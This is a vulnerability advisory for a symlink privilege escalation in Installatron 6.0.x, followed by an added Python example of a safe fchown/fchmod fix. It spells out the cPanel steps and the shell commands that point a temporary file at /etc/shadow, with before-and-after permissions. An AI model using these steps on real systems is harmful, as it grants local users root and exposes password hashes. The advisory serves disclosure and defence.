Installatron 6.0.5 Release and 6.0.3 Stable - local users could escalate privileges to root



DESCRIPTION


Installatron handled user-controllable data as root, allowing a symlink attack and, ultimately, privilege escalation to root.



IMPACT


Local users with access to Installatron could obtain root privileges via the following steps:

01. Log into cPanel
02. Click the "Installatron Applications Installer" link
03. Click the "WordPress" link
04. Click the "install this application" link
05. Click "Next" (Introduction)
06. Click "Next" (Location)
07. Click "Next" (Version)
08. Click "I Accept" (License)
09. Click "Next" (Database)
10. Click "Next" (Settings)
11. Click "Submit" (Confirmation)

12. Run the following in a shell:

[user@host ~]$ cd .installatron/current
[user@host ~/.installatron/current]$ mv 377ovO 377ovO.old
[user@host ~/.installatron/current]$ ln -s /etc/shadow 377ovO

13. Click "Complete"


This is what /etc/shadow looked like before:

-r-------- 1 root root 1181 Jul  2 12:40 /etc/shadow

and this is what it looked like afterwards:

-rw------- 1 user user 1216 Jul  2 12:50 /etc/shadow


This bug was found through simple observation of the Installatron logs in /var/installatron/logs. When the "Complete" button is clicked in step 13 above, the following is logged to the /var/installatron/logs/filesystem_log file:

09:43:45-04:00 SUCCESS chown(/home/user/.installatron/current/3EqlBV) - code: core_chown($path,911);core_chgrp($path,908);
09:43:45-04:00 SUCCESS chmod(/home/user/.installatron/current/3EqlBV) - code: core_chmod($path,384);
09:43:45-04:00 SUCCESS chown(/home/user/.installatron/current/3EqlBV) - code: core_chown($path,911);core_chgrp($path,908);
09:43:45-04:00 SUCCESS chmod(/home/user/.installatron/current/3EqlBV) - code: core_chmod($path,384);
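
The following is an added example, not Installatron's code and not part of the original advisory. It shows one way a privileged process can apply the logged chown/chmod pair (mode 384 is octal 0600) to an opened file descriptor rather than to a path the user can swap, refusing symlinks, non-regular files and hard links. The function names, the UnsafePathError class and the treatment of the home directory as a trusted base are assumptions made for illustration.

```python
import os
import stat

# Hypothetical helper names; not taken from Installatron.
class UnsafePathError(Exception):
    """The path is not a plain file reachable without following links."""

_DIR = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW | os.O_CLOEXEC
_FILE = os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK | os.O_CLOEXEC

def open_beneath(base, relpath):
    """Open relpath under the trusted directory base, refusing any symlink."""
    parts = relpath.split("/")
    if any(p in ("", ".", "..") for p in parts):
        raise UnsafePathError("bad component in %r" % relpath)
    dirfd = os.open(base, os.O_RDONLY | os.O_DIRECTORY | os.O_CLOEXEC)
    try:
        for part in parts[:-1]:
            nxt = os.open(part, _DIR, dir_fd=dirfd)  # fails on a symlinked dir
            os.close(dirfd)
            dirfd = nxt
        return os.open(parts[-1], _FILE, dir_fd=dirfd)  # ELOOP on a symlink
    except OSError as exc:
        raise UnsafePathError("refusing %r: %s" % (relpath, exc)) from exc
    finally:
        os.close(dirfd)

def set_owner_mode(base, relpath, uid, gid, mode):
    """chown/chmod the opened inode itself, never a path that can be swapped."""
    fd = open_beneath(base, relpath)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise UnsafePathError("not a regular file: %r" % relpath)
        if st.st_nlink != 1:  # a hard link could alias a file elsewhere
            raise UnsafePathError("multiple hard links: %r" % relpath)
        os.fchown(fd, uid, gid)
        os.fchmod(fd, mode)
    finally:
        os.close(fd)
```

Dropping privileges to the account that owns the home directory before touching anything beneath it removes the need for these checks altogether.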